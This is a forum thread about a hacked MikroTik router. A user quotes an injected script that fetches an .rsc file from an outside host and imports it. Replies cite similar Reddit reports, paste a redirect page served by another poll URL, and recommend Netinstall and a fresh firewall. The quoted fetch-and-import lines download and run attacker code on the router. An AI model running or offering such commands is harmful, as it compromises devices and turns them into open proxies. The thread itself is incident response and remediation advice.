hi,
One of our routers was hacked and the following script was added:
/tool fetch url=http://zancetom.com/poll/8e39cd78-78ec-4361-b86a-7794dc7ccbe8 mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
No VLan or VPN’s was created but my IP Socks was enabled and had 200 connections.
My firmware was 6.48.2 which I thought was not vulnerable to this hack.
Is there anyway to find out what this was supposed to do?
Thanks.
Post the script content here and let’s see what there is, because I don’t want to go to that website to find out.
306 Days ago: https://www.reddit.com/r/mikrotik/comments/ixrday/got_hacked_and_a_rsc_file_was_downloaded_to_my/
<html><head><meta http-equiv="refresh" content="0;url=http://searchguide.level3.com/search/?q=http://gamedate.xyz%2Fpoll%2F7c8c30a0-e932-4a1e-8f03-623d9c04df79&t=0&bc="/></head><body><script type="text/javascript">window.location="http://searchguide.level3.com/search/?q="+escape(window.location)+"&r="+escape(document.referrer)+"&t=0&bc=+"&r="+escape(document.referrer)+"&t=0&bc=)";</script></body></html>
179 Days ago: https://www.reddit.com/r/mikrotik/comments/l65fur/found_a_vpn_interface_and_scheduled_script_in_my/
There are only on solution to fix this and that is Netinstall. https://wiki.mikrotik.com/wiki/Manual:Netinstall
Removing the config is not enough.
And also:
The default firewall after a recent RouterOS install on “home routers” (not CCR, RB1100 etc) will be fine.
Note that updating RouterOS does not change the firewall, so when you had a very old install and merely updated it, you could still have a bad firewall.